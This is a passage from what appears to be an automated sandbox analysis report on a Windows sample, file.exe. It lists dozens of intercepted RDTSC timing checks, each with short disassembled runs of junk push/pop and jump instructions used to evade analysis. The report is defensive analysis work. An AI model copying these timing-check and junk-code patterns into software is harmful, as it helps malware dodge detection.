0x00000071 push edx 0x00000072 pop edx 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3EFB second address: 12F3F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4202h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F849CDA4206h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4071 second address: 12F4075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB1EB second address: 12FB1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB1EF second address: 12FB1F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB1F7 second address: 12FB1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FBBD9 second address: 12FBBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FBBDF second address: 12FBBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnl 00007F849CDA41F6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC4D0 second address: 12FC4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC4D8 second address: 12FC4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC4E1 second address: 12FC4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC4E5 second address: 12FC501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F849CDA41F6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC501 second address: 12FC51C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849C4F2D9Fh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC51C second address: 12FC522 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC522 second address: 12FC537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F849C4F2D9Ch 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FCABC second address: 12FCAD6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F849CDA4204h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FCAD6 second address: 12FCADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301A85 second address: 1301AB4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F849CDA41FCh 0x00000008 jnc 00007F849CDA41F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 jnl 00007F849CDA41F6h 0x00000018 pop edx 0x00000019 push eax 0x0000001a jmp 00007F849CDA4203h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B41 second address: 1305B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B47 second address: 1305B62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4207h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B62 second address: 1305B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849C4F2D9Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B72 second address: 1305B8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F849CDA4203h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B8A second address: 1305B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F849C4F2D96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B9C second address: 1305BA7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304CC7 second address: 1304CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304CD0 second address: 1304CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304CD4 second address: 1304CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304CDA second address: 1304CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CDA4204h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305130 second address: 1305140 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F849C4F2DA2h 0x00000008 jne 00007F849C4F2D96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13053E2 second address: 13053FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849CDA4206h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130556B second address: 1305570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130585C second address: 1305863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305863 second address: 1305875 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F849C4F2D98h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jo 00007F849C4F2DB1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130BDDF second address: 130BDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA41FFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130BF14 second address: 130BF1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130BF1C second address: 130BF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130BF20 second address: 130BF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C1F8 second address: 130C1FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C1FC second address: 130C202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C202 second address: 130C208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C208 second address: 130C21F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F849C4F2D9Ch 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130CED6 second address: 130CEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130CEDA second address: 130CEE0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D5BF second address: 130D5E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849CDA4209h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13148C8 second address: 13148CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13148CE second address: 13148D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13145EA second address: 13145EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13145EE second address: 1314606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F849CDA41F8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F849CDA41F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1314606 second address: 131460A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320703 second address: 132070F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F849CDA41FEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1323890 second address: 1323894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1323894 second address: 13238B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4209h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13238B8 second address: 13238CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849C4F2DA1h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13238CE second address: 13238D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132343C second address: 1323440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1323440 second address: 132345D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4200h 0x00000007 jnc 00007F849CDA41F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257A12 second address: 1257A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257A16 second address: 1257A20 instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334349 second address: 133434F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133434F second address: 133438A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F849CDA41F6h 0x00000008 js 00007F849CDA41F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jg 00007F849CDA41F6h 0x00000017 jns 00007F849CDA41F6h 0x0000001d jmp 00007F849CDA4207h 0x00000022 jno 00007F849CDA41F6h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FE54 second address: 125FE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F849C4F2D96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337BB5 second address: 1337BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849CDA41FAh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337BC5 second address: 1337BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337BCB second address: 1337BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337BD1 second address: 1337BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F849C4F2D96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337BE4 second address: 1337C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F849CDA4203h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F849CDA4209h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D580 second address: 124D58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F849C4F2D96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D58A second address: 124D598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F849CDA41FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133A160 second address: 133A19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849C4F2D9Bh 0x00000009 push eax 0x0000000a jmp 00007F849C4F2DA1h 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F849C4F2DA8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340CAE second address: 1340CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133F40D second address: 133F418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F849C4F2D96h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133F418 second address: 133F41D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133F93F second address: 133F945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FA82 second address: 133FA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FA8C second address: 133FA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jne 00007F849C4F2D96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FA9B second address: 133FA9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FD5A second address: 133FD6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F849C4F2D9Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FD6C second address: 133FD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FCh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FECF second address: 133FED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344365 second address: 134436D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134436D second address: 1344372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344372 second address: 1344378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C0D8 second address: 134C0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C0DC second address: 134C0E6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C0E6 second address: 134C0EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D82C second address: 134D830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D830 second address: 134D870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA6h 0x00000007 jmp 00007F849C4F2D9Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jmp 00007F849C4F2D9Dh 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c pushad 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D870 second address: 134D894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F849CDA41F6h 0x0000000a jmp 00007F849CDA4209h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13567D5 second address: 13567E5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F849C4F2D96h 0x00000008 jl 00007F849C4F2D96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365440 second address: 1365444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375E81 second address: 1375E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375E87 second address: 1375E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374D85 second address: 1374D8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375050 second address: 1375055 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375055 second address: 137505B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137505B second address: 1375071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jl 00007F849CDA41FAh 0x0000000e push eax 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375071 second address: 1375077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375077 second address: 137507B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13751DC second address: 13751F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F849C4F2D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F849C4F2D9Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375349 second address: 1375364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375364 second address: 1375382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebx 0x00000007 push esi 0x00000008 jmp 00007F849C4F2DA2h 0x0000000d pop esi 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13758CF second address: 13758D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F849CDA41F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375A09 second address: 1375A0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375A0E second address: 1375A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F849CDA4200h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375B8C second address: 1375BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
